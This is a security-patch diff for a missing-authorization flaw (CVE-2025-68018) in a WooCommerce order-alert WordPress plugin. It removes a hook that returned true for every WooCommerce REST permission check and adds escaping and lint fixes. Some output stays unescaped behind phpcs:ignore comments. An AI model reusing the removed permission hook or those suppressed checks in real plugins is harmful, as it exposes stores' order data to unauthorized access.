CVE-2025-68018: Order Listener for WooCommerce <= 3.6.1 – Missing Authorization (woc-order-alert)

--- a/woc-order-alert/includes/class-functions.php
+++ b/woc-order-alert/includes/class-functions.php
@@ -83,7 +83,7 @@
 				$is_success = $is_success ? 'success' : 'error';
 			}

-			printf( '<div class="notice notice-%s %s"><p>%s</p></div>', $is_success, $is_dismissible ? 'is-dismissible' : '', $message );
+			printf( '<div class="notice notice-%1$s %2$s"><p>%3$s</p></div>', esc_attr( $is_success ), $is_dismissible ? 'is-dismissible' : '', wp_kses_post( $message ) );
 		}

 		/**
@@ -103,7 +103,7 @@
 			$option_val = get_option( $option_key, $default_val );
 			$option_val = empty( $option_val ) ? $default_val : $option_val;

-			return apply_filters( 'woc_filters_option_' . $option_key, $option_val );
+			return apply_filters( 'woc_filters_option_' . $option_key, $option_val ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
@@ -125,7 +125,7 @@
 			$meta_value = get_post_meta( $post_id, $meta_key, true );
 			$meta_value = empty( $meta_value ) ? $default : $meta_value;

-			return apply_filters( 'woc_filters_get_meta', $meta_value, $meta_key, $post_id, $default );
+			return apply_filters( 'woc_filters_get_meta', $meta_value, $meta_key, $post_id, $default ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
--- a/woc-order-alert/includes/class-hooks.php
+++ b/woc-order-alert/includes/class-hooks.php
@@ -26,7 +26,7 @@
 			add_action( 'admin_bar_menu', array( $this, 'handle_admin_bar_menu' ), 9999, 1 );

 			add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
-			add_filter( 'woocommerce_rest_check_permissions', '__return_true' );
+			add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 );
 			add_filter( 'plugin_row_meta', array( $this, 'add_plugin_meta' ), 10, 2 );
 			add_filter( 'plugin_action_links_' . OLISTENER_PLUGIN_FILE, array( $this, 'add_plugin_actions' ), 10, 2 );

@@ -35,6 +35,22 @@
 			add_action( 'woocommerce_new_order', array( $this, 'woocommerce_new_order' ), 10, 2 );
 		}

+		/**
+		 * Proper permission check for WooCommerce REST API
+		 *
+		 * @param bool   $permission Current permission value
+		 * @param string $context   Request context (read/write)
+		 * @param int    $object_id Post / product ID
+		 * @param string $post_type Post type (product, order, etc.)
+		 * @return bool Permission result
+		 */
+		public function woa_check_permissions( $permission, $context, $object_id, $post_type ) {
+			if ( current_user_can( 'manage_woocommerce' ) ) {
+				return true;
+			}
+			return $permission;
+		}
+

 		/**
 		 * Add capabilities to shop manager for Order Notifier
@@ -155,8 +171,8 @@

 			global $wpdb;

-			$all_orders           = $wpdb->get_results(
-				$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE read_status = %s", 'unread' )
+			$all_orders           = $wpdb->get_results( // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
+				$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE read_status = %s", 'unread' )
 			);
 			$all_orders           = ! is_array( $all_orders ) ? array() : $all_orders;
 			$order_list_items_all = olistener()->get_order_list_items();
@@ -169,7 +185,7 @@

 				if ( ! $order instanceof WC_Order ) {
 					$trashed_items ++;
-					$wpdb->delete( OLISTENER_DATA_TABLE, array( 'order_id' => $order_item->order_id ) );
+					$wpdb->delete( OLISTENER_DATA_TABLE, array( 'order_id' => $order_item->order_id ) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 					continue;
 				}

@@ -193,9 +209,9 @@
 					$item_data[] = sprintf( '<div class="olistener-row-item"><div class="order-action mark-read tt--top" aria-label="%s"><span class="dashicons dashicons-visibility"></span></div></div>', esc_html__( 'Mark as Read', 'woc-order-alert' ) );
 				}

-				printf( '<div class="olistener-row order-%s">%s</div>', $order->get_id(), implode( '', $item_data ) );
+				printf( '<div class="olistener-row order-%s">%s</div>', esc_attr( $order->get_id() ), wp_kses_post( implode( '', $item_data ) ) );

-				$wpdb->update( OLISTENER_DATA_TABLE, array( 'read_status' => 'read' ), array( 'id' => $order_item->id ) );
+				$wpdb->update( OLISTENER_DATA_TABLE, array( 'read_status' => 'read' ), array( 'id' => $order_item->id ) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			}

 			wp_send_json_success(
@@ -223,7 +239,7 @@
 			if ( apply_filters( 'olistener_filters_should_notify', true, $order_id, $order ) ) {

 				$order_total  = $order->get_total();
-				$all_orders   = $wpdb->get_results(
+				$all_orders   = $wpdb->get_results( // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 					$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE order_id = %d", $order_id )
 				);
 				$all_orders   = ! is_array( $all_orders ) ? array() : $all_orders;
@@ -238,10 +254,10 @@

 				if ( $latest_order ) {
 					if ( current_time( 'U' ) - strtotime( $latest_order->datetime ) > 10 ) {
-						$wpdb->insert( OLISTENER_DATA_TABLE, $order_args );
+						$wpdb->insert( OLISTENER_DATA_TABLE, $order_args ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery
 					}
 				} else {
-					$wpdb->insert( OLISTENER_DATA_TABLE, $order_args );
+					$wpdb->insert( OLISTENER_DATA_TABLE, $order_args ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery
 				}
 			}
 		}
--- a/woc-order-alert/includes/class-olistener-pro.php
+++ b/woc-order-alert/includes/class-olistener-pro.php
@@ -2,6 +2,8 @@

 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'OlistenerPro' ) ) {
 	class OlistenerPro {

@@ -40,7 +42,7 @@
 		public function apply_pro_settings( $should_notify, $order_id, $order = null ) {

 			// Debug: Log the function call
-			error_log('OlistenerPro::apply_pro_settings called for order ID: ' . $order_id);
+			error_log('OlistenerPro::apply_pro_settings called for order ID: ' . $order_id); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log

 			// Remove the activation check that might be blocking the logic
 			// The PRO functionality should work regardless of activation status for testing
@@ -56,7 +58,7 @@
 			$order              = $order ?: wc_get_order( $order_id );

 			if (!$order instanceof WC_Order) {
-				error_log('OlistenerPro - Invalid order object for ID: ' . $order_id);
+				error_log('OlistenerPro - Invalid order object for ID: ' . $order_id); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 				return $should_notify;
 			}

@@ -169,25 +171,25 @@
 			$rules_relation = (array) Utils::get_option('olistener_rules_relation', array());

 			// Debug: Log the summary and rules
-			error_log('OlistenerPro - Summary: ' . print_r($summary, true));
-			error_log('OlistenerPro - Rules Relation: ' . print_r($rules_relation, true));
+			error_log('OlistenerPro - Summary: ' . print_r($summary, true)); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+			error_log('OlistenerPro - Rules Relation: ' . print_r($rules_relation, true)); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r

 			// If no rules are selected, return true if any condition is met
 			if (empty($rules_relation)) {
 				$result = in_array(true, $summary);
-				error_log('OlistenerPro - No rules selected, result: ' . ($result ? 'true' : 'false'));
+				error_log('OlistenerPro - No rules selected, result: ' . ($result ? 'true' : 'false')); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 				return $result;
 			}

 			// Check if all selected rules are satisfied
 			foreach ($rules_relation as $rule) {
 				if (!isset($summary[$rule]) || !$summary[$rule]) {
-					error_log('OlistenerPro - Rule "' . $rule . '" failed or not set');
+					error_log('OlistenerPro - Rule "' . $rule . '" failed or not set'); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 					return false;
 				}
 			}

-			error_log('OlistenerPro - All rules passed, returning true');
+			error_log('OlistenerPro - All rules passed, returning true'); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 			return true;
 		}
 	}
--- a/woc-order-alert/includes/class-plugin-settings.php
+++ b/woc-order-alert/includes/class-plugin-settings.php
@@ -205,9 +205,9 @@
 							'type'         => 'checkbox',
 							'options'      => olistener()->get_rules_relations(),
 							'desc'         => esc_html__( 'Please select the conditions you wish to check for new order checking.', 'woc-order-alert' ) . '<br>' .
-							                  __( '<strong>Multi conditions selected</strong> - System will notify you only if all the checked conditions are matched.' ) . '<br>' .
-							                  __( '<strong>Single condition selected</strong> - System will notify you only when the selected condition is matched.' ) . '<br>' .
-							                  __( '<strong>No condition selected</strong> - System will notify you if any of the condition is matched.' ),
+							                  __( '<strong>Multi conditions selected</strong> - System will notify you only if all the checked conditions are matched.', 'woc-order-alert' ) . '<br>' .
+							                  __( '<strong>Single condition selected</strong> - System will notify you only when the selected condition is matched.', 'woc-order-alert' ) . '<br>' .
+							                  __( '<strong>No condition selected</strong> - System will notify you if any of the condition is matched.', 'woc-order-alert' ),
 							'availability' => olistener()->is_pro() ? '' : 'pro',
 							'dependency'   => array( 'olistener_enable_rules', '==', true ),
 						),
--- a/woc-order-alert/includes/functions.php
+++ b/woc-order-alert/includes/functions.php
@@ -8,6 +8,7 @@

 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;

 if ( ! function_exists( 'olistener' ) ) {
 	function olistener() {
@@ -91,6 +92,7 @@
 			$order_customers[] = sprintf( '<a href="%s">#%s</a>', admin_url( 'edit.php?post_type=shop_order&_customer_user=' . $order_customer_id ), $order->get_billing_first_name() );
 		}

-		return sprintf( esc_html__( 'Congratulations! You have received order(%s) from %s' ), implode( ', ', $order_ids ), implode( ', ', $order_customers ) );
+		/* translators: 1: Order IDs, 2: Customer Names */
+		return sprintf( esc_html__( 'Congratulations! You have received order(%1$s) from %2$s', 'woc-order-alert' ), implode( ', ', $order_ids ), implode( ', ', $order_customers ) );
 	}
 }
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-client.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-client.php
@@ -10,6 +10,8 @@

 use WPDK_Settings;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Client
  *
@@ -136,7 +138,7 @@
 	 */
 	function manage_permanent_dismissible() {

-		$query_args = wp_unslash( array_map( 'sanitize_text_field', $_GET ) );
+		$query_args = wp_unslash( array_map( 'sanitize_text_field', $_GET ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended

 		if ( Utils::get_args_option( 'pb_action', $query_args ) == 'permanent_dismissible' && ! empty( $id = Utils::get_args_option( 'id', $query_args ) ) ) {

@@ -218,12 +220,12 @@
 						'id'        => $permanent_dismiss
 					), site_url( 'wp-admin' )
 				) ),
-				esc_html__( 'Dismiss', $this->text_domain )
+				esc_html__( 'Dismiss', $this->text_domain ) // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			);
 		}

 		if ( ! empty( $message ) ) {
-			printf( '<div class="notice notice-%s %s">%s%s</div>', $type, $is_dismissible, $message, $pb_dismissible );
+			printf( '<div class="notice notice-%s %s">%s%s</div>', $type, $is_dismissible, $message, $pb_dismissible ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			?>
             <style>
                 .pb-is-dismissible {
@@ -294,7 +296,7 @@
 	public function get_website_url( $path = '' ) {

 		if ( is_multisite() && isset( $_SERVER['SERVER_NAME'] ) ) {
-			return sanitize_text_field( $_SERVER['SERVER_NAME'] ) . '/' . $path;
+			return sanitize_text_field( $_SERVER['SERVER_NAME'] ) . '/' . $path; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		}

 		return site_url( $path );
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-license.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-license.php
@@ -7,6 +7,8 @@

 use WP_REST_Request;

+defined( 'ABSPATH' ) || exit;
+
 class License {

 	protected $client;
@@ -91,7 +93,7 @@
 		if ( ! isset( $schedules['daily'] ) ) {
 			$schedules['daily'] = array(
 				'interval' => 24 * HOUR_IN_SECONDS,
-				'display'  => esc_html__( 'Daily' ),
+				'display'  => esc_html__( 'Daily', 'woc-order-alert' ),
 			);
 		}

@@ -111,7 +113,7 @@
 		$params = $request->get_body_params();

 		if ( empty( $license_data = Utils::get_args_option( 'license_data', $params ) ) ) {
-			return new WP_REST_Response( array( 'code' => 404, 'message' => esc_html__( 'License data not found.', $this->client->text_domain ) ) );
+			return new WP_REST_Response( array( 'code' => 404, 'message' => esc_html__( 'License data not found.', $this->client->text_domain ) ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 		}

 		update_option( $this->option_key, $license_data );
@@ -273,7 +275,7 @@
 	function add_plugin_action_links( $links ) {

 		return array_merge( array(
-			'license' => sprintf( '<a href="%s">%s</a>', $this->license_page_url, esc_html__( 'License', $this->client->text_domain ) ),
+			'license' => sprintf( '<a href="%s">%s</a>', $this->license_page_url, esc_html__( 'License', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 		), $links );
 	}

@@ -283,12 +285,20 @@
 	 */
 	function license_activation_notices() {

-		if ( $this->is_valid() || ( isset( $_GET['page'] ) && sanitize_text_field( $_GET['page'] == $this->menu_args['menu_slug'] ) ) ) {
+		if ( $this->is_valid() || ( isset( $_GET['page'] ) && sanitize_text_field( $_GET['page'] == $this->menu_args['menu_slug'] ) ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			return;
 		}
-
-		$license_message = sprintf( __( '<p>You must activate <strong>%s</strong> to unlock the premium features, enable single-click download, and etc. Dont have your key? <a href="%s" target="_blank">Your license keys</a></p><p><a class="button-primary" href="%s">Activate License</a></p>' ),
-			$this->client->plugin_name, sprintf( '%s/my-account/license-keys/', $this->client->integration_server ), $this->license_page_url
+		$license_message = sprintf(
+			wp_kses_post(
+				/* translators: 1: Plugin name, 2: License keys URL, 3: Activation page URL */
+				__(
+					'<p>You must activate <strong>%1$s</strong> to unlock the premium features, enable single-click download, and etc. Don’t have your key? <a href="%2$s" target="_blank">Your license keys</a></p><p><a class="button-primary" href="%3$s">Activate License</a></p>',
+					$this->client->text_domain // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+				)
+			),
+			esc_html( $this->client->plugin_name ),
+			esc_url( sprintf( '%s/my-account/license-keys/', $this->client->integration_server ) ),
+			esc_url( $this->license_page_url )
 		);

 		$this->client->print_notice( $license_message, 'warning' );
@@ -304,10 +314,11 @@

 		$defaults = array(
 			'type'        => 'submenu', // Can be: menu, options, submenu
-			'page_title'  => sprintf( __( 'Manage License - %s', $this->client->text_domain ), $this->client->plugin_name ),
-			'menu_title'  => __( 'Manage License', $this->client->text_domain ),
+			/* translators: %s: Plugin name */
+			'page_title' => sprintf( __( 'Manage License - %s', $this->client->text_domain ), esc_html( $this->client->plugin_name ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+			'menu_title' => __( 'Manage License', $this->client->text_domain ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			'capability'  => 'manage_options',
-			'menu_slug'   => $this->client->text_domain . '-manage-license',
+			'menu_slug'   => $this->client->text_domain . '-manage-license', // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			'position'    => null,
 			'icon_url'    => '',
 			'parent_slug' => '',
@@ -371,24 +382,34 @@
 	 */
 	public function render_license_page() {

-		if ( isset( $_POST['submit'] ) ) {
+		if ( isset( $_POST['submit'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
 			$this->process_form_submission();
 		}

 		$this->render_licenses_style();

-		$get_string         = array_map( 'sanitize_text_field', $_GET );
-		$script_name        = sanitize_text_field( $_SERVER['SCRIPT_NAME'] );
+		$get_string         = array_map( 'sanitize_text_field', $_GET ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		$script_name        = sanitize_text_field( $_SERVER['SCRIPT_NAME'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotValidated, WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		$license_form_url   = add_query_arg( $get_string, admin_url( basename( $script_name ) ) );
 		$license_action     = $this->is_valid() ? 'slm_deactivate' : 'slm_activate';
 		$license_readonly   = $this->is_valid() ? 'readonly="readonly"' : '';
-		$license_submit_btn = $this->is_valid() ? __( 'Deactivate License', $this->client->text_domain ) : __( 'Activate License', $this->client->text_domain );
+		$license_submit_btn = $this->is_valid() ? __( 'Deactivate License', $this->client->text_domain ) : __( 'Activate License', $this->client->text_domain ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain

 		?>
         <div class="wrap pb-license-settings-wrapper">
             <h1>
-				<?php printf( __( 'License settings for <strong>%s</strong>', $this->client->text_domain ), $this->client->plugin_name ); ?>
-				<?php printf( __( '<sub style="font-size: 12px; vertical-align: middle;">%s</sub>' ), $this->plugin_version ); ?>
+				<?php
+					printf(
+							/* translators: %s: Plugin name */
+							__( 'License settings for <strong>%s</strong>', $this->client->text_domain ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.Security.EscapeOutput.OutputNotEscaped
+							$this->client->plugin_name // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+						);  ?>
+				<?php
+					printf(
+						/* translators: %s: Plugin version */
+						__( '<sub style="font-size: 12px; vertical-align: middle;">%s</sub>', 'woc-order-alert' ),  $this->plugin_version // phpcs:ignore WordPress.WP.I18n.NoHtmlWrappedStrings, WordPress.Security.EscapeOutput.OutputNotEscaped
+					);
+				?>
             </h1>

             <div class="pb-license-settings action-<?php echo esc_attr( $license_action ); ?>">
@@ -399,13 +420,18 @@
                         <path d="m150 85.849c-13.111 0-23.775 10.665-23.775 23.775v25.319h47.548v-25.319c-1e-3 -13.108-10.665-23.775-23.773-23.775z"/>
                         <path d="m150 1e-3c-82.839 0-150 67.158-150 150 0 82.837 67.156 150 150 150s150-67.161 150-150c0-82.839-67.161-150-150-150zm46.09 227.12h-92.173c-9.734 0-17.626-7.892-17.626-17.629v-56.919c0-8.491 6.007-15.582 14.003-17.25v-25.697c0-27.409 22.3-49.711 49.711-49.711 27.409 0 49.709 22.3 49.709 49.711v25.697c7.993 1.673 14 8.759 14 17.25v56.919h2e-3c0 9.736-7.892 17.629-17.626 17.629z"/>
                     </svg>
-                    <span><?php esc_html_e( 'Manage License', $this->client->text_domain ); ?></span>
+                    <span><?php esc_html_e( 'Manage License', $this->client->text_domain ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain ?></span>
                 </div>

                 <div class="pb-license-details">
                     <p>
                         <label for="pb-license-field">
-							<?php printf( __( 'Activate or Deactivate <strong>%s</strong> by your license key to get support and automatic update from your WordPress dashboard.' ), $this->client->plugin_name ); ?>
+							<?php printf(
+										/* translators: %s: Plugin name */
+										__( 'Activate or Deactivate <strong>%s</strong> by your license key to get support and automatic update from your WordPress dashboard.', 'woc-order-alert' ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+										$this->client->plugin_name // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+									);
+							?>
                         </label>
                     </p>
                     <form method="post" action="<?php echo esc_url_raw( $license_form_url ); ?>" novalidate="novalidate" spellcheck="false">
@@ -422,16 +448,20 @@
                                         id="pb-license-field"
                                         autocomplete="off"
                                         value="<?php echo esc_attr( $this->get_license_key_for_input_field( $license_action ) ); ?>"
-                                        placeholder="<?php echo esc_attr( __( 'Enter your license key to activate', $this->client->text_domain ) ); ?>"/>
+                                        placeholder="<?php echo esc_attr( __( 'Enter your license key to activate', $this->client->text_domain ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain ?>"/>
                             </div>
                             <button type="submit" name="submit"><?php echo esc_html( $license_submit_btn ); ?></button>
                         </div>
                     </form>
                     <p>
-						<?php printf( __( 'Find your %s and %s latest version from your account.', $this->client->text_domain ),
-							sprintf( '<a target="_blank" href="%s/my-account/license-keys/"><strong>%s</strong></a>', $this->client->integration_server, esc_html__( 'License keys', $this->client->text_domain ) ),
-							sprintf( '<a target="_blank" href="%s/my-account/downloads/"><strong>%s</strong></a>', $this->client->integration_server, esc_html__( 'Download', $this->client->text_domain ) )
-						); ?>
+						<?php
+							printf(
+								/* translators: 1: License keys link, 2: Download link */
+								wp_kses_post( __( 'Find your %1$s and %2$s latest version from your account.', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+								sprintf( '<a target="_blank" href="%1$s"><strong>%2$s</strong></a>', esc_url( $this->client->integration_server . '/my-account/license-keys/' ), esc_html__( 'License keys', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+								sprintf( '<a target="_blank" href="%1$s"><strong>%2$s</strong></a>', esc_url( $this->client->integration_server . '/my-account/downloads/' ), esc_html__( 'Download', $this->client->text_domain ) ) // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+							);
+						?>
                     </p>
                 </div>
             </div>
@@ -445,16 +475,16 @@
 	 */
 	function process_form_submission() {

-		if ( ! wp_verify_nonce( isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '', $this->license_nonce() ) ) {
+		if ( ! wp_verify_nonce( isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '', $this->license_nonce() ) ) { // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotValidated, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
 			return;
 		}

-		$license_key    = isset( $_POST['license_key'] ) ? trim( sanitize_text_field( $_POST['license_key'] ) ) : '';
+		$license_key    = isset( $_POST['license_key'] ) ? trim( sanitize_text_field( $_POST['license_key'] ) ) : ''; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		$license_key    = str_replace( ' ', '', $license_key );
-		$license_action = isset( $_POST['license_action'] ) ? sanitize_text_field( $_POST['license_action'] ) : '';
+		$license_action = isset( $_POST['license_action'] ) ? sanitize_text_field( $_POST['license_action'] ) : ''; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash

 		if ( empty( $license_key ) || empty( $license_action ) ) {
-			$this->client->print_notice( sprintf( '<p>%s</p>', __( 'Invalid license key', $this->client->text_domain ) ), 'error' );
+			$this->client->print_notice( sprintf( '<p>%s</p>', __( 'Invalid license key', $this->client->text_domain ) ), 'error' ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain

 			return;
 		}
@@ -576,7 +606,7 @@
 	 * @return string
 	 */
 	private function license_nonce() {
-		return sprintf( 'pb_license_%s', str_replace( '-', '_', $this->client->text_domain ) );
+		return sprintf( 'pb_license_%s', str_replace( '-', '_', $this->client->text_domain ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 	}


--- a/woc-order-alert/includes/wp-dev-kit/classes/class-notifications.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-notifications.php
@@ -5,6 +5,8 @@

 namespace WPDK;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Notifications
  *
@@ -45,7 +47,7 @@
 	 * Force check notifications
 	 */
 	function force_check_notifications() {
-		if ( Utils::get_args_option( 'force-check', wp_unslash( $_GET ) ) === 'yes' ) {
+		if ( Utils::get_args_option( 'force-check', wp_unslash( $_GET ) ) === 'yes' ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			$this->set_cached_notification_data( $this->get_latest_notification_data() );
 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-utils.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-utils.php
@@ -5,6 +5,8 @@

 namespace WPDK;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Utils
  *
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/abstract.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/abstract.class.php
@@ -8,6 +8,8 @@
  *
  */

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings_Abstract' ) ) {
 	abstract class WPDK_Settings_Abstract {

@@ -19,7 +21,7 @@
 			// Collect output css and typography
 			if ( ! empty( $this->args['output_css'] ) || ! empty( $this->args['enqueue_webfont'] ) ) {
 				add_action( 'wp_enqueue_scripts', array( $this, 'collect_output_css_and_typography' ), 10 );
-				WPDK_Settings::$css = apply_filters( "pb_settings_{$this->unique}_output_css", WPDK_Settings::$css, $this );
+				WPDK_Settings::$css = apply_filters( "pb_settings_{$this->unique}_output_css", WPDK_Settings::$css, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 			}

 		}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/admin-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/admin-options.class.php
@@ -7,6 +7,9 @@
  * @version 1.0.0
  *
  */
+
+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings_Options' ) ) {
 	class WPDK_Settings_Options extends WPDK_Settings_Abstract {

@@ -92,8 +95,8 @@
 		public function __construct( $key, $params = array() ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			// run only is admin panel options, avoid performance loss
 			$this->pre_tabs     = $this->pre_tabs( $this->sections );
@@ -227,7 +230,7 @@
 			$result = $this->set_options( true );

 			if ( ! $result ) {
-				wp_send_json_error( array( 'error' => esc_html__( 'Error while saving the changes.' ) ) );
+				wp_send_json_error( array( 'error' => esc_html__( 'Error while saving the changes.', 'woc-order-alert' ) ) );
 			} else {
 				wp_send_json_success( array( 'notice' => $this->notice, 'errors' => $this->errors ) );
 			}
@@ -266,7 +269,7 @@

 			// XSS ok.
 			// No worries, This "POST" requests is sanitizing in the below foreach. see #L337 - #L341
-			$response = ( $ajax && ! empty( $_POST['data'] ) ) ? json_decode( wp_unslash( trim( $_POST['data'] ) ), true ) : map_deep( $_POST, 'sanitize_text_field' );
+			$response = ( $ajax && ! empty( $_POST['data'] ) ) ? json_decode( wp_unslash( trim( $_POST['data'] ) ), true ) : map_deep( $_POST, 'sanitize_text_field' ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized

 			// Set variables.
 			$data      = array();
@@ -287,7 +290,7 @@
 					$import_data  = json_decode( wp_unslash( trim( $response['pb_settings_import_data'] ) ), true );
 					$options      = ( is_array( $import_data ) && ! empty( $import_data ) ) ? $import_data : array();
 					$importing    = true;
-					$this->notice = esc_html__( 'Settings successfully imported.' );
+					$this->notice = esc_html__( 'Settings successfully imported.', 'woc-order-alert' );

 				}

@@ -299,7 +302,7 @@
 						}
 					}

-					$this->notice = esc_html__( 'Default settings restored.' );
+					$this->notice = esc_html__( 'Default settings restored.', 'woc-order-alert' );

 				} else if ( ! empty( $transient['reset_section'] ) && ! empty( $section_id ) ) {

@@ -315,7 +318,7 @@

 					$data = wp_parse_args( $data, $this->options );

-					$this->notice = esc_html__( 'Default settings restored.' );
+					$this->notice = esc_html__( 'Default settings restored.', 'woc-order-alert' );

 				} else {

@@ -371,18 +374,18 @@

 				}

-				$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $this );
+				$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-				do_action( "pb_settings_{$this->unique}_save_before", $data, $this );
+				do_action( "pb_settings_{$this->unique}_save_before", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 				$this->options = $data;

 				$this->save_options( $data );

-				do_action( "pb_settings_{$this->unique}_save_after", $data, $this );
+				do_action( "pb_settings_{$this->unique}_save_after", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 				if ( empty( $this->notice ) ) {
-					$this->notice = esc_html__( 'Settings saved.' );
+					$this->notice = esc_html__( 'Settings saved.', 'woc-order-alert' );
 				}

 				return true;
@@ -406,7 +409,7 @@
 				update_option( $this->unique, $data );
 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}

@@ -537,7 +540,7 @@
 			$nav_type      = ( $this->args['nav'] === 'inline' ) ? 'inline' : 'normal';
 			$form_action   = ( $this->args['form_action'] ) ? $this->args['form_action'] : '';

-			do_action( 'pb_settings_options_before' );
+			do_action( 'pb_settings_options_before' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

